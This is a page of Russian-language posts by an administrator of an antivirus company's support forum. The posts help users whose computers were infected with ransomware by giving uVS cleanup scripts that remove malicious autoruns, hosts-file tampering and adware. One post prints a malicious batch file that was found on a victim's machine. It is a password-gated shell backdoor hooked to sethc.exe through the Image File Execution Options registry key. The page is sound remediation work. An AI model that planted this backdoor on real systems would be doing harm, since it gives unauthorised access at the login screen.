Дорогие участники форума!

Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше. После официального ухода компании ESET с российского рынка мы приступили к разработке новых продуктов вместе с новыми партнёрами. Приглашаем вас присоединиться к нашему новому форуму PRO32.

Мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новые продукты компании PRO32.

PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств. Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

Перейти на PRO32
Поиск  Пользователи  Правила  Войти
Пользователи santy
Выбрать дату в календареВыбрать дату в календаре

Пред. 1 ... 467 468 469 470 471 472 473 474 475 476 477 ... 1784 След.
файлы зашифрованы в Cryakl CL 0.1.*.*-1.3.*.*, Filecoder.EQ/Encoder.567/Cryakl
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 16.12.2015 14:22:37
Валентин,
по очистке системы выполните

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
Код

;uVS v3.86.7 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v385c
OFFSGNSAVE
;------------------------autoscript---------------------------

chklst
delvir

delref %SystemDrive%\PROGRAM FILES (X86)\EXPLORE.EXE
deldirex %SystemDrive%\USERS\USER\APPDATA\ROAMING\BROWSER EXTENSIONS

regt 28
regt 29
deltmp
delnfr
;-------------------------------------------------------------

restart

перезагрузка, пишем о старых и новых проблемах.
------------

по расшифровке напишите в [email protected] при наличие лицензии на антивирус ESET
[ Как создать образ автозапуска? ]
Перейти
файлы зашифрованы с расширением .xtbl; .breaking_bad, Filecoder.ED / Encoder.858 / Ransom.Shade; ransom_note: readme*.txt
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 16.12.2015 13:09:20
Алексей,
по очистке системы выполните:

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
Код

;uVS v3.86.7 [http://dsrt.dyndns.org]
;Target OS: NTv5.1
v385c
OFFSGNSAVE
;------------------------autoscript---------------------------

chklst
delvir

delref /C ATTRIB -H C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS && COPY C:\DOCUME~1\7D74~1\LOCALS~1\TEMP\28743328 C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS /Y && ATTRIB +H C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS

delref HTTP=127.0.0.1:61152

delref HTTP://ELTRASTA.COM/SIUPD/COMPLETED2.RHT

delref %SystemDrive%\DOCUMENTS AND SETTINGS\ЛЮДА\APPLICATION DATA\IZDEVO\SYQYC.EXE

delref %SystemDrive%\DOCUMENTS AND SETTINGS\ЛЮДА\APPLICATION DATA\SIVYR\HIECC.EXE

delref HTTP=127.0.0.1:56848

delhst 127.0.0.1 neklassniki.ru v.vhodilka.ru workandtalk.ru nonymizer.ru unboo.ru jelya.ru
delhst 37.10.117.106 odnoklassniki.ru vk.com www.odnoklassniki.ru m.odnoklassniki.ru

regt 14

; McAfee Security Scan Plus
exec C:\Program Files\McAfee Security Scan\uninstall.exe
; Java(TM) 6 Update 7
exec MsiExec.exe /I{3248F0A8-6813-11D6-A77B-00B0D0160070} /quiet
deltmp
delnfr
;-------------------------------------------------------------

restart

перезагрузка, пишем о старых и новых проблемах.
------------

по расшифровке напишите в [email protected] при наличие лицензии на антивирус ESET
[ Как создать образ автозапуска? ]
Перейти
файлы зашифрованы с расширением .xtbl; .breaking_bad, Filecoder.ED / Encoder.858 / Ransom.Shade; ransom_note: readme*.txt
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 16.12.2015 11:06:39
судя по образу уже очищена система от шифратора.

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
Код

;uVS v3.86.7 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v385c
OFFSGNSAVE
;------------------------autoscript---------------------------

chklst
delvir

deldirex %SystemDrive%\PROGRAM FILES (X86)\SKINAPP

delref HTTP://KARTASIM.RU/?UTM_SOURCE=UOUA03&UTM_CONTENT=EAFCF562095A1E5D5EBF58B348A0FF29&UTM_TERM=925621FACF47D26D7881644519BF3C22

deltmp
delnfr
;-------------------------------------------------------------

restart

перезагрузка, пишем о старых и новых проблемах.
------------


по расшифровке напишите в [email protected] при наличие лицензии на антивирус ESET
[ Как создать образ автозапуска? ]
Перейти
файлы зашифрованы в Cryakl CL 0.1.*.*-1.3.*.*, Filecoder.EQ/Encoder.567/Cryakl
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 16.12.2015 10:06:21
Clean master сами ставили?

C:\PROGRAM FILES (X86)\CMCM\CLEAN MASTER\CMLIVE.EXE
[ Как создать образ автозапуска? ]
Перейти
файлы зашифрованы с расширением .xtbl; .breaking_bad, Filecoder.ED / Encoder.858 / Ransom.Shade; ransom_note: readme*.txt
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 16.12.2015 05:53:43
Юрий Станкевич,
добавьте образ автозапуска
http://forum.esetnod32.ru/forum9/topic2687/
[ Как создать образ автозапуска? ]
Перейти
[ Закрыто] Обнаружена проблема с безопасностью вашего компьютера, Ваш компьютер осуществляет вирусную сетевую активность
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 16.12.2015 05:51:29
по компьютеру alla:

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
Код

;uVS v3.86.7 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v385c
OFFSGNSAVE
;------------------------autoscript---------------------------

hide %SystemDrive%\PROGRAM FILES\K-LITE CODEC PACK\TOOLS\MEDIAINFO.EXE
chklst
delvir

delref HTTP://SINDEX.BIZ/?COMPANY=2

deltmp
delnfr
;-------------------------------------------------------------

restart

перезагрузка, пишем о старых и новых проблемах.
------------
далее,
сделайте дополнительно быструю проверку системы в малваребайт
http://forum.esetnod32.ru/forum9/topic10688/
[ Как создать образ автозапуска? ]
Перейти
файлы зашифрованы с расширением .xtbl; .breaking_bad, Filecoder.ED / Encoder.858 / Ransom.Shade; ransom_note: readme*.txt
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 15.12.2015 17:05:45
Антонина,
по очистке системы выполните

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
Код

;uVS v3.86.7 [http://dsrt.dyndns.org]
;Target OS: NTv5.1
v385c
OFFSGNSAVE
;------------------------autoscript---------------------------

chklst
delvir

delref %SystemDrive%\PROGRAM FILES\KINO-FILMOV.NET\TBKINO.DLL

delref %Sys32%\CSRCS.EXE

delref %SystemDrive%\DOCUMENTS AND SETTINGS\1\LOCAL SETTINGS\APPLICATION DATA\YANDEX\UPDATER\PRAETORIAN.EXE

deldirex %SystemDrive%\DOCUMENTS AND SETTINGS\1\APPLICATION DATA\SWVUPDATER

delref ONAOZBILJNO/JAMUVAM.EXE

delref HTTP://HPTDS6.RU/

; Kino-Filmov.Net Toolbar
exec C:\PROGRA~1\KINO-F~1.NET\UNWISE.EXE   /U C:\PROGRA~1\KINO-F~1.NET\INSTALL.LOG
; Java(TM) 6 Update 2
exec MsiExec.exe /I{3248F0A8-6813-11D6-A77B-00B0D0160020} /quiet
deltmp
delnfr
;-------------------------------------------------------------

restart

перезагрузка, пишем о старых и новых проблемах.
------------

по расшифровке документов напишите в [email protected] при наличие лицензии на антивирус ESET
[ Как создать образ автозапуска? ]
Перейти
зашифровано с расширением *[email protected], возможно, Filecoder.DG
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 15.12.2015 17:02:23
выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
Код

;uVS v3.86.7 [http://dsrt.dyndns.org]
;Target OS: NTv6.3
v385c
OFFSGNSAVE
zoo %SystemDrive%\PROGRAMDATA\MICROSOFT\DRM\SMSS.EXE
addsgn 98F41F2AC82A4C9A45FCAEB1DB5C120525013B1E2709E0870CA62D37A45F4F1ADC021FC77E5516073B0989AF8C5649713BDB4B4E9F9AB0A77B7F2D3A87CC6273 8 Win32/ServiceEx

zoo %SystemDrive%\PROGRAMDATA\MICROSOFT\DRM\WA\SERVICES.EXE
addsgn 1A86B99A5583338CF42B627D339E9971019A77BAADEE9404A1CF4E7DDB07728A18E9B55F05AD92CB4383849F49AC6CA27C93E87326DD4388C460A72FC787DBF3 8 Win32/Packed.Autoit

zoo %SystemDrive%\DOCUMENTS AND SETTINGS\ALL USERS\MICROSOFT\DRM\WA\SERVICES.EXE
zoo %SystemRoot%\SYSWOW64\MTMONITOR\TMMT64.EXE
addsgn BA6F9BB2BD8154720B9C2D754C2124FBDA75303AC9A957FB69E38D37892964995917C3EE3F559D49A28526914716A1CB5FDFE83ADE1158FD3277A4ACFA882C72 8 Monitor.Win64.Mikpo.a [Kaspersky]

delref %SystemRoot%\SYSWOW64\NLS.BAT
;------------------------autoscript---------------------------

chklst
delvir

deldirex %SystemRoot%\SYSWOW64\MTMONITOR

deltmp
delnfr
;-------------------------------------------------------------
CZOO
restart

перезагрузка, пишем о старых и новых проблемах.
------------
по расшифровке документов напишите в [email protected] при наличие лицензии на антивирус ESET
[ Как создать образ автозапуска? ]
Перейти
зашифровано с расширением *[email protected], возможно, Filecoder.DG
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 15.12.2015 16:14:53
а это ваш файл?

Полное имя                  C:\WINDOWS\SYSWOW64\NLS.BAT
Имя файла                   NLS.BAT
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                           
Удовлетворяет критериям    
IMAGE FILE EXECUTION.EXE    (ССЫЛКА ~ \IMAGE FILE EXECUTION OPTIONS\)(1)   OR   (ССЫЛКА ~ .EXE\DEBUGGER)(1) [auto (0)]
                           
Сохраненная информация      на момент создания образа
Статус                      ПОДОЗРИТЕЛЬНЫЙ в автозапуске
Размер                      163 байт
Создан                      08.12.2015 в 20:20:01
Изменен                     03.11.2015 в 21:07:29
Атрибуты                    СКРЫТЫЙ  СИСТЕМНЫЙ  
Цифр. подпись               Отсутствует либо ее не удалось проверить
                           
Статус                      ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Тип запуска                 Неизвестный отладчик приложения(ий)
Атрибут файла               "Скрытый" или "Системный" [типично для вирусов]
                           
Доп. информация             на момент обновления списка
SHA1                        26075AC1C001707F43B6F9D56BEC4A612A1B53D6
MD5                         017894FF97D0A56126730FE33B0253F2
                           
#FILE#                      @ECHO OFF
:PASS
set/p "pass=>"
if NOT %pass%== gjitknsyf[eqgblfhfc goto FAIL
start cmd.exe
goto END
:FAIL
echo Invalid password
goto PASS
:END


378519
                           
Ссылки на объект            
Ссылка                      HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger
[ Как создать образ автозапуска? ]
Перейти
зашифровано с расширением *[email protected], возможно, Filecoder.DG
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 15.12.2015 14:15:04
Вячеслав,
MPK сами ставили на сервер?
[ Как создать образ автозапуска? ]
Перейти
Пред. 1 ... 467 468 469 470 471 472 473 474 475 476 477 ... 1784 След.